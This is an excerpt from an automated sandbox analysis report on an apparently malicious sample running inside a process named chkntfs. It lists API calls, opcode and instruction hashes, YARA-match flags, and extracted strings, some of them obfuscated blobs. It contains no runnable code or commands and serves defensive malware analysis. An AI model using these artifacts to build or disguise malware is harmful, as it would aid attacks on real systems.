                                                                      • Instruction ID: 91bbcdb22351aeb727bf1c7acb7c3f8baae95c780ab51be84f0560c9fe1484ee
                                                                      • Opcode Fuzzy Hash: 7fda123ae788be64ab2a9a01aa2374057dd2d38cafb237f5b7f9c9b16f9a9a40
                                                                      • Instruction Fuzzy Hash: 59E0DF312402082AEB20AAAC9C45B6333489F58A6CF484A62F85C9B7C1EA78F8024260
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02498D2C
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 3851150aa64265f956e7ed99a6736c220be9650e4da4b604245bbead48572e97
                                                                      • Instruction ID: 2b92f52d474cf85d7de1e9189d9ced7cd03619a5d1c77073b795959435556cb9
                                                                      • Opcode Fuzzy Hash: 3851150aa64265f956e7ed99a6736c220be9650e4da4b604245bbead48572e97
                                                                      • Instruction Fuzzy Hash: 57E0203534020026EB20567CCC45BE337545F5576CF48477AF858DB7C1E67CE4424210
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,024926C0,024A897F,024A603F,02492686), ref: 02498B23
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      • Opcode ID: 5e0f9fef4c1580ce3005deb3f9a8f6e5f144d9dbdff5251f7972d4499cbe5165
                                                                      • Instruction ID: 66031de953cf5afa52a9e098928828345f421d4d370be9e26680dafb0d7e33b4
                                                                      • Opcode Fuzzy Hash: 5e0f9fef4c1580ce3005deb3f9a8f6e5f144d9dbdff5251f7972d4499cbe5165
                                                                      • Instruction Fuzzy Hash: E4E0CD71A503013EF751E6B48C02F7B27995B50704F04407AF84CDA2C3E965D4014B10
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,024926C0,024A897F,024A603F,02492686), ref: 02498B23
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      • Opcode ID: 0d1ba9ecf89ddc10cfea6e392e50e82452ab718cec93230a1c7e6ed9aabf43ea
                                                                      • Instruction ID: 586530557619464104de65bde0b38cd75d4e8e8b22dfc193c75e74a3124c9fc4
                                                                      • Opcode Fuzzy Hash: 0d1ba9ecf89ddc10cfea6e392e50e82452ab718cec93230a1c7e6ed9aabf43ea
                                                                      • Instruction Fuzzy Hash: EAD05E716803053BF640F6A98C06F6B328D9B14B58F04407AB94CEB2C3FD65F40046A5
                                                                      APIs
                                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 0249179D
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID:
                                                                      • API String ID: 1836367815-0
                                                                      • Opcode ID: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
                                                                      • Instruction ID: b6614e9f2d3fb5ed8bbcf40106fdb385103ca2eb3ae08abf3d6079cbe9af668f
                                                                      • Opcode Fuzzy Hash: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
                                                                      • Instruction Fuzzy Hash: 6ED0A732B8060E34FE2141515C82FFE7F6C8B41A40F0001ABFB0CF40C1D681140506A5
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 3f96acd5859786629a9fb8741f9e4a8d83dc88fb2acd8e11535b56869229263e
                                                                      • Instruction ID: ab502a8714d8b925dd8bc0c6e4d7122f74b52a5ad0a280c1b2f55a5aac7d82e7
                                                                      • Opcode Fuzzy Hash: 3f96acd5859786629a9fb8741f9e4a8d83dc88fb2acd8e11535b56869229263e
                                                                      • Instruction Fuzzy Hash: 00B04C799015D585EE51A760460861779106BD0705F19C066D2121651A4768D191E175
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4623907489.00000000042A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_42a0000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 648541c48bfb2d7907bca4d84a78f54403aa3665ea34609fb1f4b7642c60b3de
                                                                      • Instruction ID: 28935ba6bda9b892d772e27dd23eead121cde6de09750948abd8d1586e8d59b7
                                                                      • Opcode Fuzzy Hash: 648541c48bfb2d7907bca4d84a78f54403aa3665ea34609fb1f4b7642c60b3de
                                                                      • Instruction Fuzzy Hash: AE411771B28B0E4FD36CEF6890816B6B3E1FB49344F50452DDD8AC3252EA70F8568785
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9969910ace3fd6408f402ad504e3731939b5115990ec8a76a0662ece0818d841
                                                                      • Instruction ID: 3af1e0f36c60f172e783649c516e1e983ceba5652383b705d6f13b7f753cf723
                                                                      • Opcode Fuzzy Hash: 9969910ace3fd6408f402ad504e3731939b5115990ec8a76a0662ece0818d841
                                                                      • Instruction Fuzzy Hash: 2DC08C13B040088284289C0A78042B0E2D4838B1A1E1023FBA808EF3448846C882A08C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4623907489.00000000042A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_42a0000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                      • API String ID: 0-3558027158
                                                                      • Opcode ID: d1247cc15040e493bca0900b6c0869cb41a0d51992c24b124d3f56c877f82fec
                                                                      • Instruction ID: accbe02f4ee6516e4768ebc676c087c1d2ff7c6d1ee65ad215afef6d5c4b3321
                                                                      • Opcode Fuzzy Hash: d1247cc15040e493bca0900b6c0869cb41a0d51992c24b124d3f56c877f82fec
                                                                      • Instruction Fuzzy Hash: 079160F04582988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB85
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4623907489.00000000042A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_42a0000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !#i1$#$6j$#i'6$'!#i$'0/ $'2/)$'66*$(!jl$(i>.$*j'6$/%'2$/)(i$/+'!$2#>2$2+*m$6*/%$7{vh$>+*j$>+*}$i.2+$il}7$j/+'${vh~
                                                                      • API String ID: 0-2202094905
                                                                      • Opcode ID: 8569638777c49d2e083df600593ea57bf7420dd0ce573459038614d7157df99a
                                                                      • Instruction ID: b65cabc1e30697827e79e2156af0f6ecf0d64ba55444a5ce8a036a790f6510ff
                                                                      • Opcode Fuzzy Hash: 8569638777c49d2e083df600593ea57bf7420dd0ce573459038614d7157df99a
                                                                      • Instruction Fuzzy Hash: B82166B054430CDFCF259F84E691BEEBB70FF10348F816289E9486B245C6358A56CB88
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                      • API String ID: 48624451-2108815105
                                                                      • Opcode ID: a540904c48a05cb862952a6230e1619c7a5b746530d9eebccee92f752ebb801e
                                                                      • Instruction ID: 29e2a2126cd35f529ddaa413e97aa84cd0e191723f966af5d4933bb9a55b0d51
                                                                      • Opcode Fuzzy Hash: a540904c48a05cb862952a6230e1619c7a5b746530d9eebccee92f752ebb801e
                                                                      • Instruction Fuzzy Hash: 7B51E6A5F00516BFDF60DF989C9057EF7B8BB08204B18826FE559D7641E2B4FE018BA0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                      • API String ID: 48624451-2108815105
                                                                      • Opcode ID: f911e5fa77ffa446d502ce397d6eb3a4abd6eae9927d52f3e9c8244b7bb5720f
                                                                      • Instruction ID: ed5ef473e4c3b381d0fc726f5da848c26cd9e45f1d05141e227790d5437a8670
                                                                      • Opcode Fuzzy Hash: f911e5fa77ffa446d502ce397d6eb3a4abd6eae9927d52f3e9c8244b7bb5720f
                                                                      • Instruction Fuzzy Hash: CE51F471A00A45AFDF20DF5DD89097EB7F8BB44205F04889AF595D7641E674FA00EB60
                                                                      Strings
                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 044F4787
                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 044F4655
                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 044F4725
                                                                      • Execute=1, xrefs: 044F4713
                                                                      • ExecuteOptions, xrefs: 044F46A0
                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 044F46FC
                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 044F4742
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                      • API String ID: 0-484625025
                                                                      • Opcode ID: e96e360d0f8a62bec27df6cec7e709e9f7cdac5f95b326fc1c6992aa513ba471
                                                                      • Instruction ID: 92bae524e9ea30dc4e42a94919bdf0505301d3eaae79aa2057ff66616e0eaed3
                                                                      • Opcode Fuzzy Hash: e96e360d0f8a62bec27df6cec7e709e9f7cdac5f95b326fc1c6992aa513ba471
                                                                      • Instruction Fuzzy Hash: 255129356002197BEF20AAA5DC85FEE77A8FF44314F1400AFD645A7281EB70BE459FA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                      • Instruction ID: 6cce85106d8fe44f8e6b0bc9d70b90653b86ea654d0fb1699480a877cb500a1c
                                                                      • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                      • Instruction Fuzzy Hash: 2A022671508381AFD704CF29C4A0A6FBBE5FFC8714F44892EB9998B264DB31E905DB42
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: __aulldvrm
                                                                      • String ID: +$-$0$0
                                                                      • API String ID: 1302938615-699404926
                                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                      • Instruction ID: 16afc1e51a8a5eeb0196cc8f64ac851d8e1b4acd2d475bda9dfedab028201988
                                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                      • Instruction Fuzzy Hash: 8881CF38E462898ADFA48E68E8927FEBBB1EF45310F1C411FD851A7391D734B8418B61
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: %%%u$[$]:%u
                                                                      • API String ID: 48624451-2819853543
                                                                      • Opcode ID: 6732f7462bbd6d306a97e19a9eef150db874487b87e9635884a7d4aeff03b29a
                                                                      • Instruction ID: ec40fb019dc11e34893981280ce8ac70db92791b2e1bd9f3a747eef3243d5b19
                                                                      • Opcode Fuzzy Hash: 6732f7462bbd6d306a97e19a9eef150db874487b87e9635884a7d4aeff03b29a
                                                                      • Instruction Fuzzy Hash: 4D215176A00619ABDB20DFA9DD54AEEB7F8EF44745F04016AF905E3201E730E9019BA1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4623907489.00000000042A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_42a0000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $ma#$&;(1$'- 5$3$H$ma%$
                                                                      • API String ID: 0-1881785983
                                                                      • Opcode ID: f0f70a53993f002c255d974eff043295aa552179a1b75f50dfdf67b8424f2ce2
                                                                      • Instruction ID: 476f7387fd805191d61029e65aa755b93c4f4f22f471e20f4c449377254eabe5
                                                                      • Opcode Fuzzy Hash: f0f70a53993f002c255d974eff043295aa552179a1b75f50dfdf67b8424f2ce2
                                                                      • Instruction Fuzzy Hash: F8F0B4701187844BD709AF14D448AAABAE0FF8934DF401B5DE8CDCB252EB78C644CB46
                                                                      Strings
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 044F02E7
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 044F02BD
                                                                      • RTL: Re-Waiting, xrefs: 044F031E
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                      • API String ID: 0-2474120054
                                                                      • Opcode ID: b0e77b065fcf85c047fa5eaf324aca6fe2eabf4a6ca34f4eec064624ea99a27c
                                                                      • Instruction ID: 2b3b4358b288f4165fa69bf185cd9d7f772d656d32a3a87a241033520305beac
                                                                      • Opcode Fuzzy Hash: b0e77b065fcf85c047fa5eaf324aca6fe2eabf4a6ca34f4eec064624ea99a27c
                                                                      • Instruction Fuzzy Hash: E2E1C0746047419FEB25CF28C884B2AB7E0BB98314F144A2EF5958B3E1E774F859CB52
                                                                      Strings
                                                                      • RTL: Resource at %p, xrefs: 044F7B8E
                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 044F7B7F
                                                                      • RTL: Re-Waiting, xrefs: 044F7BAC
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                      • API String ID: 0-871070163
                                                                      • Opcode ID: 1ae035cd1bbaa4df615d66cb06caef83d27182dc722d351b2e3ded354058dbd5
                                                                      • Instruction ID: 91676fe1ed9c21d85270355283fbd37e7f350c779c15900d43bf94faee5a0697
                                                                      • Opcode Fuzzy Hash: 1ae035cd1bbaa4df615d66cb06caef83d27182dc722d351b2e3ded354058dbd5
                                                                      • Instruction Fuzzy Hash: 4A41D1357057429FEB20DE25CC40B6BB7E5EB89714F100A1EE996DB780DB71F4058BA1
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 044F728C
Strings
• RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 044F7294
• RTL: Resource at %p, xrefs: 044F72A3
• RTL: Re-Waiting, xrefs: 044F72C1
Memory Dump Source
• Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
• Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 885266447-605551621
• Opcode ID: c726792721a50642472da5c3cce5024a267786b866978b572342c4c213c74f3e
• Instruction ID: c04a11f5149b928502a899911e265fbf1b84cd301c21952ee6050a65fc4b2cce
• Opcode Fuzzy Hash: c726792721a50642472da5c3cce5024a267786b866978b572342c4c213c74f3e
• Instruction Fuzzy Hash: 2B412535700242AFEF20DE65CC41F6AB7A1FB84714F10461AFA959B780DB24F802DBE1
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
• Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$]:%u
• API String ID: 48624451-3050659472
• Opcode ID: 7b5529af1e87a2d1fd473a097799376a8386cb4e89b90a1ab1a38dcd33bfc0c8
• Instruction ID: d12895f08a5e212a8aac03f86b244e85443dc536079167bf98bea8efb8cea3f9
• Opcode Fuzzy Hash: 7b5529af1e87a2d1fd473a097799376a8386cb4e89b90a1ab1a38dcd33bfc0c8
• Instruction Fuzzy Hash: DA318072A006199FDB20DE29DC50BEEB7F8FB44715F54459AE849E3200EB30BA459BA1
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
• Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-
• API String ID: 1302938615-2137968064
• Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
• Instruction ID: b94a3f6ca784897d6b3171bae129dbfa963181215f97e66621b1cd6369298d21
• Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
• Instruction Fuzzy Hash: AA915279A00217DBEFA4DE6AC8816BFB7A5AF44721F1C451FE855A73C0E730A9418F60
Strings
Memory Dump Source
• Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
• Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
Similarity
• API ID:
• String ID: $$@
• API String ID: 0-1194432280
• Opcode ID: bee4318dbf0962681beebf1b361bbb32eb9f7f2c5ac7af9057e1a3dba26c1ed4
• Instruction ID: 0f33fd659923a6da6df44dd4deb26e0c4660aea8a6a731d26c84a5e0f94883fc
• Opcode Fuzzy Hash: bee4318dbf0962681beebf1b361bbb32eb9f7f2c5ac7af9057e1a3dba26c1ed4
• Instruction Fuzzy Hash: 96811AB1D006699BDF319B55CC44BEEB6B8BB08714F0441EBA909B7240E770AE859FA0
APIs
• @_EH4_CallFilterFunc@8.LIBCMT ref: 0450CFBD
Strings
Memory Dump Source
• Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
• Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
Similarity
• API ID: CallFilterFunc@8
• String ID: @$@4Cw@4Cw
• API String ID: 4062629308-3101775584
• Opcode ID: 4db62b9b4cad270bca7ddf2c99c79a51fa90c6d6340e3b17181ac7e1b6b6660f
• Instruction ID: b708123bf683670dd75330e535cec1155f1fe05ced51c3855d8d0dff72aa0851
• Opcode Fuzzy Hash: 4db62b9b4cad270bca7ddf2c99c79a51fa90c6d6340e3b17181ac7e1b6b6660f
• Instruction Fuzzy Hash: 7A41CF75900214DFEF219FA5E840AAEBBF8FF45B14F00852EE905DB295E774E804EB61
Strings
Memory Dump Source
• Source File: 00000006.00000002.4623907489.00000000042A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_42a0000_chkntfs.jbxd
Similarity
• API ID:
• String ID: '0$2x49$Z%lg$lg$\
• API String ID: 0-144640928
• Opcode ID: 010db89e9fa414004482d366cc169a8b047d7d85f26668a0921655e3cd305815
• Instruction ID: c7c1e47964108c8e93467d53819f2865ba6f35e3192d45a0d27a579a41500a10
• Opcode Fuzzy Hash: 010db89e9fa414004482d366cc169a8b047d7d85f26668a0921655e3cd305815
• Instruction Fuzzy Hash: 1AF030341287844BD708EB18C41565ABBD0FF9870CF804A5DE8CDDA291EA79D646C78B